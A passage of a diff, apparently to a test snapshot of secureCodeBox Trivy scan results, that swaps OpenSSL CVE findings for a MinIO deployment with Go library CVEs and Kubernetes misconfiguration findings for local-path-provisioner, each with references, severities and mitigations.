"https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", - "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", - "https://linux.oracle.com/cve/CVE-2022-4450.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", - "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4450", - "https://www.openssl.org/news/secadv/20230207.txt", - ], - }, - "category": "Vulnerability", - "description": "The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "double free after calling PEM_read_bio_ex", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4450", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4450", + "value": "https://pkg.go.dev/golang.org/x/text/language", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", + "value": "https://pkg.go.dev/vuln/GO-2021-0113", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.3.8", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-32149", + "installedVersion": "v0.3.3", + "packageName": "golang.org/x/text", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-32149", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "https://github.com/golang/go/issues/56152", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "https://go.dev/cl/442235", + "https://go.dev/issue/56152", + "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "https://pkg.go.dev/vuln/GO-2022-1059", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32149", + ], + }, + "category": "Vulnerability", + "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://avd.aquasec.com/nvd/cve-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "https://access.redhat.com/security/cve/CVE-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://github.com/golang/go/issues/56152", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://go.dev/cl/442235", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://go.dev/issue/56152", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://pkg.go.dev/vuln/GO-2022-1059", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "2.2.8", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2019-11254", + "installedVersion": "v2.2.4", + "packageName": "gopkg.in/yaml.v2", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-11254", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=18496", + "https://github.com/advisories/GHSA-wxc4-f4m6-wwqv", + "https://github.com/go-yaml/yaml/commit/53403b58ad1b561927d19068c655246f2db79d48", + "https://github.com/go-yaml/yaml/pull/555", + "https://github.com/kubernetes/kubernetes/issues/89535", + "https://github.com/kubernetes/kubernetes/pull/87467/commits/b86df2bec4f377afc0ca03482ffad2f0a49a83b8", + "https://groups.google.com/d/msg/kubernetes-announce/ALL9s73E5ck/4yHe8J-PBAAJ", + "https://groups.google.com/forum/#!topic/kubernetes-security-announce/wuwEwZigXBc", + "https://linux.oracle.com/cve/CVE-2019-11254.html", + "https://linux.oracle.com/errata/ELSA-2020-5653.html", + "https://nvd.nist.gov/vuln/detail/CVE-2019-11254", + "https://pkg.go.dev/vuln/GO-2020-0036", + "https://security.netapp.com/advisory/ntap-20200413-0003/", + "https://www.cve.org/CVERecord?id=CVE-2019-11254", + ], + }, + "category": "Vulnerability", + "description": "The Kubernetes API Server component in versions 1.1-1.14, and versions prior to 1.15.10, 1.16.7 and 1.17.3 allows an authorized user who sends malicious YAML payloads to cause the kube-apiserver to consume excessive CPU cycles while parsing YAML.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "kubernetes: Denial of service in API server via crafted YAML payloads by authorized users", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://avd.aquasec.com/nvd/cve-2019-11254", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://access.redhat.com/security/cve/CVE-2019-11254", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=18496", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://github.com/advisories/GHSA-wxc4-f4m6-wwqv", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://github.com/go-yaml/yaml/commit/53403b58ad1b561927d19068c655246f2db79d48", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://github.com/go-yaml/yaml/pull/555", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://github.com/kubernetes/kubernetes/issues/89535", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://github.com/kubernetes/kubernetes/pull/87467/commits/b86df2bec4f377afc0ca03482ffad2f0a49a83b8", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://groups.google.com/d/msg/kubernetes-announce/ALL9s73E5ck/4yHe8J-PBAAJ", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://groups.google.com/forum/#!topic/kubernetes-security-announce/wuwEwZigXBc", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://linux.oracle.com/cve/CVE-2019-11254.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://linux.oracle.com/errata/ELSA-2020-5653.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11254", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://pkg.go.dev/vuln/GO-2020-0036", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://security.netapp.com/advisory/ntap-20200413-0003/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-11254", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "0.20.0-alpha.2", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2020-8565", + "installedVersion": "v0.17.1", + "packageName": "k8s.io/client-go", + "references": [ + "https://access.redhat.com/security/cve/CVE-2020-8565", + "https://github.com/advisories/GHSA-8cfg-vx93-jvxw", + "https://github.com/kubernetes/kubernetes/commit/e99df0e5a75eb6e86123b56d53e9b7ca0fd00419", + "https://github.com/kubernetes/kubernetes/issues/95623", + "https://github.com/kubernetes/kubernetes/pull/95316", + "https://groups.google.com/g/kubernetes-announce/c/ScdmyORnPDk", + "https://groups.google.com/g/kubernetes-security-discuss/c/vm-HcrFUOCs/m/36utxAM5CwAJ", + "https://nvd.nist.gov/vuln/detail/CVE-2020-8565", + "https://pkg.go.dev/vuln/GO-2021-0064", + "https://www.cve.org/CVERecord?id=CVE-2020-8565", + ], + }, + "category": "Vulnerability", + "description": "In Kubernetes, if the logging level is set to at least 9, authorization and bearer tokens will be written to log files. This can occur both in API server logs and client tool output like kubectl. This affects <= v1.19.3, <= v1.18.10, <= v1.17.13, < v1.20.0-alpha2.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "kubernetes: Incomplete fix for CVE-2019-11250 allows for token leak in logs when logLevel >= 9", + "references": [ { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", + "value": "https://avd.aquasec.com/nvd/cve-2020-8565", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", + "value": "https://access.redhat.com/security/cve/CVE-2020-8565", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", + "value": "https://github.com/advisories/GHSA-8cfg-vx93-jvxw", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4450.html", + "value": "https://github.com/kubernetes/kubernetes/commit/e99df0e5a75eb6e86123b56d53e9b7ca0fd00419", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://github.com/kubernetes/kubernetes/issues/95623", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", + "value": "https://github.com/kubernetes/kubernetes/pull/95316", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + "value": "https://groups.google.com/g/kubernetes-announce/c/ScdmyORnPDk", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://groups.google.com/g/kubernetes-security-discuss/c/vm-HcrFUOCs/m/36utxAM5CwAJ", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4450", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8565", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://pkg.go.dev/vuln/GO-2021-0064", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-8565", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0215", - "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "libssl1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2023-0215", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", - "https://github.com/advisories/GHSA-r7jw-wp68-3xch", - "https://linux.oracle.com/cve/CVE-2023-0215.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", - "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", - "https://security.netapp.com/advisory/ntap-20230427-0007/", - "https://security.netapp.com/advisory/ntap-20230427-0009/", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://ubuntu.com/security/notices/USN-5845-1", - "https://ubuntu.com/security/notices/USN-5845-2", - "https://www.cve.org/CVERecord?id=CVE-2023-0215", - "https://www.openssl.org/news/secadv/20230207.txt", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", ], }, - "category": "Vulnerability", - "description": "The public API function BIO_new_NDEF is a helper function used for streaming -ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the -SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by -end user applications. - -The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter -BIO onto the front of it to form a BIO chain, and then returns the new head of -the BIO chain to the caller. Under certain conditions, for example if a CMS -recipient public key is invalid, the new filter BIO is freed and the function -returns a NULL result indicating a failure. However, in this case, the BIO chain -is not properly cleaned up and the BIO passed by the caller still retains -internal pointers to the previously freed filter BIO. If the caller then goes on -to call BIO_pop() on the BIO then a use-after-free will occur. This will most -likely result in a crash. - - - -This scenario occurs directly in the internal function B64_write_ASN1() which -may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on -the BIO. This internal function is in turn called by the public API functions -PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream, -SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7. - -Other public API functions that may be impacted by this include -i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and -i2d_PKCS7_bio_stream. - -The OpenSSL cms and smime command line applications are similarly affected. - - - -", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "use-after-free following BIO_new_NDEF", + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'securityContext.allowPrivilegeEscalation' to false)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0215", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0215", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'resources.limits.cpu')", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV015", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv015", + ], + }, + "category": "Misconfiguration", + "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": "Set 'containers[].resources.requests.cpu'.", + "name": "CPU requests not specified(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'resources.requests.cpu')", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://avd.aquasec.com/misconfig/ksv015", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV016", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv016", + ], + }, + "category": "Misconfiguration", + "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": "Set 'containers[].resources.requests.memory'.", + "name": "Memory requests not specified(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'resources.requests.memory')", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://avd.aquasec.com/misconfig/ksv016", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'resources.limits.memory')", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": 